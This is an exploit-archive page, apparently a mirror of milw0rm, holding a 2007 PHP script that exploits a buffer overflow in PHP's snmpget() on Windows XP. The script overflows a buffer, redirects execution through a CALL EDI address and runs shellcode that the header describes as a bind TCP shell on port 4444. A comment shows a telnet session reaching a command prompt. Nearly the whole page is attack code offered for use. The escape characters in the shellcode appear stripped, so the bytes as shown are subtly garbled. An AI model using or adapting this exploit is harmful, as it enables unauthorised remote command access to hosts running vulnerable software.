PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)
# Published : 2007-08-09
# Author : Inphex
# Previous Title : PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit
# Next Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)

<?php
/*
Inphex
reference ->http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "xD7x98x95x7C"; #shell32.dll ->CALL EDI  WindowsXP
$shellcode=
"xbdxdbxc6x38x8fxd9xc9xd9x74x24xf4x58x31xc9" .
"xb1x51x83xc0x04x31x68x0ex03xb3xc8xdax7axbf" .
"xbfxf1xc8xd7xb9xf9x2cxd8x5ax8dxbfx02xbfx1a" .
"x7ax76x34x60x80xfex4bx76x01xb1x53x03x49x6d" .
"x65xf8x3fxe6x51x75xbex16xa8x49x58x4ax4fx89" .
"x2fx95x91xc0xddx98xd3x3ex29xa1x87xe4xfaxa0" .
"xc2x6exa5x6ex0cx9ax3cxe5x02x17x4axa6x06xa6" .
"xa7x5bx1bx23xbex37x47x2fxa0x04xb6x94x46x01" .
"xfax1ax0cx55xf1xd1x62x49xa4x6dxc2x79xe8x19" .
"x4dx37x1ax36x01x38xf4xa0xf1xa0x91x1fxc4x44" .
"x15x13x1axcbx8dx2cx8ax9bxe6x3exd7x60xa9x3f" .
"xfexc9xc0x25x99x74x3fxadx64x23xaaxacx97x1b" .
"x42x68x6ex6ex3exddx8ex46x12xb1x23x35xc6x76" .
"x97xfaxbbx87xc7x9ax53x69xb4x04xf7x00xa5x5d" .
"x9fxb6x3cx2dxa7xe0xbfx1bx4dx1fx11xf6x6dxcf" .
"xf9x5cx3cxdex10xcbxc0xc9xb0xa6xc1x26x5exad" .
"x77x41xd6x7ax77x9bxb9xd0xd3x71xc5x08x48x11" .
"xdexd1xa9x9bx77xdexe0x09x87xf0x6bxd8x13x96" .
"x1bx7fxb1xdfx39x15x19x86xe8x26x10xdfx81xf2" .
"xaaxfdx67x3bx5fxabx76xf9x8dx55xc4xd2x5ex24" .
"xb3x12xcax9dxefx0bx7ex1fx5cxddx81xaaxe7x1d" .
"xabx0fxbfxb3x05xfex6ex5exa7x51xc0xcbxf6xae" .
"x32x9bx55x89xb6x92xf5xd6x6fx40x05xd7xa7x6a" .
"x29xacx9fx68x49x76x7bx6ex98x24x7bx40x4dx38" .
"x09x65xd1xebxf1xb0x12xdbx0ex3dxed";
snmpget (1, 1, $buffer."xebx04".$ret."".$shellcode."");
?>

# www.Syue.com [2007-08-09]